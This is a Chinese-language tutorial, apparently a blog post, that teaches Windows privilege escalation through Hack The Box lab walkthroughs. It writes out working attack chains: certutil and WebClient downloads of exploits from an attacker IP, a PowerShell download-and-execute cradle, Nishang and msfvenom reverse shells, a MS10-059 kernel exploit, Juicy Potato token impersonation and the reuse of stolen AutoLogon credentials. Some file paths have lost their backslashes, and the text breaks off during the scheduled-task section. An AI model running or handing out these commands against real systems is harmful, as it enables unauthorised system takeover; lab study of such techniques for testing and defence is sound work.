黑客在Windows系统下提权的8种主要姿势，从零基础到精通，收藏这篇就够了！

前言：别慌，先看摘要！

在Windows的世界里，权限提升就像是游戏里的“开挂”，让用户能拿到比原本权限更多的系统资源。这就像小号突然变身GM，权限拉满！通常，这是通过从低级用户“跳槽”到更高级别用户实现的，比如管理员或者神秘的“NT AUTHORITY/SYSTEM”大佬。而这种“跳槽”之所以能成功，往往是因为系统里存在一些配置上的小疏忽或者漏洞。

要搞清楚管理员和系统账户的区别，得先明白他们对系统和进程的控制力是不一样的。管理员能改安全设置，装软件硬件，还能访问电脑上的所有文件，甚至能“安排”其他用户的账号。而系统账户，则是Windows自带的“超级管理员”，权限等级更高。它不对应某个具体的人，而是操作系统用来跑系统服务、进程和任务的。它能完全访问文件系统，还能执行系统级别的修改，简直是“一言九鼎”！

第一招：手动“摸底”，看看系统老底

系统信息大搜集

手动检测，说白了就是用系统自带的命令，像“人口普查”一样，把操作系统的各种信息都摸清楚，为后续的“升官发财”之路做准备。

比如，在PowerShell里敲个systeminfo，就能把系统的“户口本”都翻出来，包括系统版本、补丁情况、处理器信息、BIOS版本等等。简直是“查户口”神器！

再来个wmic qfe，就能看到Windows装了哪些更新，就像查系统的“体检报告”。黑客可以通过这个，看看有没有哪个补丁没打，然后“对症下药”，找漏洞提升权限。

用户权限大盘点

光知道系统信息还不够，还得搞清楚自己是谁，有哪些权限，属于哪个“帮派”。这就像职场晋升，先得摸清自己的“家底”。

whoami命令就是你的“身份卡”，能告诉你现在是谁在操作。加上/priv和/groups这两个选项，还能查到你的具体权限和所属的安全组。

net user命令则能把系统里所有用户的名单都打印出来，就像公司的“通讯录”。

如果想了解某个用户的详细情况，可以用net user username命令，查他的“个人档案”，包括用户名、密码信息、组成员身份等等。

net localgroup命令则能显示系统里所有可用的用户组，就像公司的“部门架构图”，让你了解系统里有哪些不同的“访问级别”。

还可以用net localgroup groupname命令，查看某个用户组的详细信息，包括这个组里的成员。

除了这些，黑客还可以通过网络枚举、杀毒软件枚举、服务和进程枚举等方式，更全面地了解Windows系统。

第二招：自动化工具，效率就是生命！

想快速找到提升权限的路径？自动化工具绝对是你的好帮手！它们能像“扫描仪”一样，高效地扫描已知漏洞、配置错误和安全弱点。

1. WinPEAS：Windows权限提升神器

WinPEAS，全称“Windows Privilege Escalation Awesome Script”，是一款开源工具，能帮你快速发现Windows系统里可能存在的权限提升路径。它就像一个“寻宝罗盘”，能用颜色编码系统，告诉你哪些地方最值得关注。WinPEAS还能识别一些常见的配置错误，比如弱文件夹权限、弱注册表权限、错误配置的服务、计划任务等等。

2. PowerUp：PowerShell脚本，专攻漏洞

PowerUp是一个PowerShell脚本，专门用来在目标系统上查找常见的权限提升漏洞。你可以用Invoke-AllChecks参数来运行它，让它执行所有检查。或者，你也可以用它来执行特定的检查，比如用Get-UnquotedService参数，只查找可能存在未引用服务路径漏洞的服务。

3. Seatbelt：系统信息收集专家

Seatbelt是GhostPack工具套件的一部分，是一个C#工具。它不直接寻找权限提升的“路”，而是通过执行一系列检查，收集系统和用户数据，来帮你识别潜在的权限提升路径。

4. SharpUp：PowerUp的C#“分身”

SharpUp也是GhostPack工具集合中的一员，是多个PowerUp功能的C#版本。它很灵活，可以单独执行漏洞检查，也可以对每个检查进行完整审计。

5. Windows Exploit Suggester：补丁“侦察兵”

Windows Exploit Suggester是一个用Python写的补丁检查工具。它会检查Windows系统的补丁情况，然后和微软的漏洞数据库进行对比，找出可能存在的漏洞。通过识别这些缺失的补丁，该工具可以提供一个潜在的漏洞列表，用于权限提升。

第三招：内核漏洞，直捣“龙穴”

内核漏洞，指的是Windows操作系统内核中存在的漏洞。利用这些漏洞，攻击者可以直接提升权限，获得未经授权的系统级别权限。这就像直接打入敌人心脏，可以完全控制系统，执行任意代码、修改系统数据、安装软件等等。

实战演练：从低级用户到系统用户

为了演示如何利用内核漏洞，这里以“Hack The Box: Devel”机器作为试验环境。

建立反向shell：首先，通过Netcat建立一个反向shell。
收集系统信息：运行systeminfo命令，将输出的内容保存到本地机器上，并命名为systeminfo.txt。
更新漏洞数据库：在使用Windows Exploit Suggester脚本之前，需要更新数据库。
运行漏洞扫描：使用系统信息和数据库文件运行Windows Exploit Suggester脚本，找到潜在的漏洞利用。
选择漏洞利用：这里我们选择MS10-059，也称为Chimichurri。这个漏洞利用能让我们以系统账户身份生成一个shell。
下载漏洞利用：从https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059下载可执行文件。注意：一定要确保下载的内容和脚本的功能，否则可能会造成严重后果！
启动Python服务器：在Kali中，进入与下载的漏洞利用相同的文件夹，启动Python服务器。

python3 -m http.server
下载漏洞利用到目标机器：返回到Windows机器上，进入临时文件夹，并使用certutil下载漏洞利用。

certutil -urlcache -f http://10.10.14.10:8000/MS10-059.exe exploit.exe
执行漏洞利用：在攻击机器上启动一个Netcat监听器。在Windows上，使用自己机器的IP和Netcat中使用的端口运行漏洞利用。

exploit.exe 10.10.14.10 5555
成功提权：回到Kali机器，你将看到成功获取到一个Shell！

温馨提示： 找到过时或未打补丁的系统可能会因为内核漏洞导致权限提升。但使用内核漏洞要小心，因为它们有时可能会导致目标系统不稳定。

第四招：Windows里的“秘密通道”：Linux子系统

WSL，也就是Windows Subsystem for Linux，是Windows系统上运行Linux的兼容性层。它能让你在Windows上直接运行GNU/Linux环境，而不需要虚拟机。

在某些情况下，如果WSL以root权限运行，就可以利用它来创建一个提升的shell。

实战演练：利用WSL的bash历史记录提权

建立shell：首先，在机器上建立一个shell。
发现WSL的线索：在Tyler的桌面上找到user.txt文件后，注意到一个bash.lnk文件。这可能说明系统正在运行WSL。
查找bash.exe：看看系统上是否正在运行bash.exe。

where /R C:Windows bash.exe
运行bash.exe：从System32文件夹运行它。

C:WindowsSystem32ash.exe
解除shell限制：使用以下命令解除shell的限制。

python3 -c 'import pty;pty.spawn("/bin/bash")'
进行Linux枚举：
查看命令行历史记录：

这里找到了Windows系统管理员的一些凭据！
利用管理员凭据：可以使用上面的命令和机器的IP来访问系统文件夹，或者运行psexec并获取一个交互式的系统shell，从而获取更多的控制权。

经验总结： 当进行枚举时，检查历史记录是一个不错的选择，里面往往藏着“金矿”！

第五招：令牌冒充，偷梁换柱

令牌冒充，就像是低权限用户偷了高权限用户的“身份证”，然后冒充他执行一些原本不被允许的操作，比如访问敏感数据或修改系统设置。

实战演练：Juicy Potato攻击

JuicyPotato攻击在Windows Server 2019或Windows 10版本1809以后不再有效。但是，其他类似的攻击可以用来利用相同的权限。

建立shell：首先，建立一个shell。
检查权限：运行whoami和whoami/priv命令，看看是否拥有执行Juicy Potato攻击所需的正确特权。
检查Windows版本：运行systeminfo，看看是否有正确的Windows版本。
下载Juicy Potato：从https://github.com/ohpe/juicy-potato/releases下载漏洞利用工具到kali系统。
设置Python服务器：确保在与漏洞利用工具相同的目录中设置了一个python3简单服务器来提供文件。

python3 -m http.server
传输Juicy Potato到目标机器：

(new-object net.webclient).downloadfile('http://10.10.14.12:8000/jp.exe', 'C:UsersmerlinDesktopjp.exe')
创建反向shell：从Nishang存储库中下载Invoke-PowerShellTcp.ps1脚本，并在脚本底部添加以下内容。

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.12 -Port 8888

将其保存为shell2.ps1。
创建.bat文件：创建一个包含以下单行命令的.bat文件。

powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.12/shell2.ps1')

将其命名为bounty.bat。
下载bounty.bat到目标机器：使用先前显示的(new-object net.webclient).downloadfile命令从服务器下载bounty.bat文件到Windows机器上。
启动Netcat监听：使用shell2.ps1脚本中的信息在Kali上启动一个Netcat监听器。
运行Juicy Potato：

./jp.exe -t * -p C:UsersmerlinDesktopounty.bat -l 4444
成功提权：现在你已经是系统用户了！

经验总结： 进入新的Windows shell时，要养成检查特权的习惯，因为随时可能存在可以被滥用的权限，让你能够提升到管理员或系统用户。

第六招：保存的凭据，意外的惊喜

在Windows中，有时会出现用户凭据以纯文本形式保存的情况。比如，启用了Windows的自动登录功能时，凭据就会以纯文本形式存储在注册表中。

实战演练：利用AutoLogon凭据提权

建立shell：首先，通过缓冲区溢出建立一个反向shell。
下载winPEAS：通过以下命令将winPEAS从攻击机器下载到目标机器。

certutil -urlcache -split -f "http://10.10.14.12:8000/winPEASany.exe" wp.exe
运行winPEAS：运行winPEAS后，会注意到它找到了用户Alfred的AutoLogon凭据。
创建反向shell：使用MSFvenom创建一个反向shell。

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.12 LPORT=4444 -f exe > shell.exe
下载shell.exe：使用certutil命令将shell.exe下载到目标机器。
启动Netcat监听：使用与MSFvenom payload相同的端口启动Netcat。
使用PowerShell提权：运行以下PowerShell命令以获取管理员权限的反向shell。

powershell -c "$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('Administrator', $password);Start-Process -FilePath "shell.exe" -Credential $creds"
成功提权：现在已经提升了权限到管理员级别！

经验总结： 有时凭据会以明文形式保存，如果它们被重新用于其他服务或用户，就可以用来提升权限。

第七招：定时任务，坐享其成

Windows中的定时任务，就像Linux环境中的cron作业一样，是在设定的时间运行某些脚本或程序的自动化方式。

实战演练：利用定时任务提权

建立shell：首先，获得一个反向shell。
查找定时任务：前往目标用户的桌面，找到有趣的.xml文件。

![](https://mmbiz.qpic.cn/mmbiz_png/0nJYWtDC09fFHTLM5gzuEm0CG4TmrUSMccTY3wVG5GLLFVFtbbCLsO0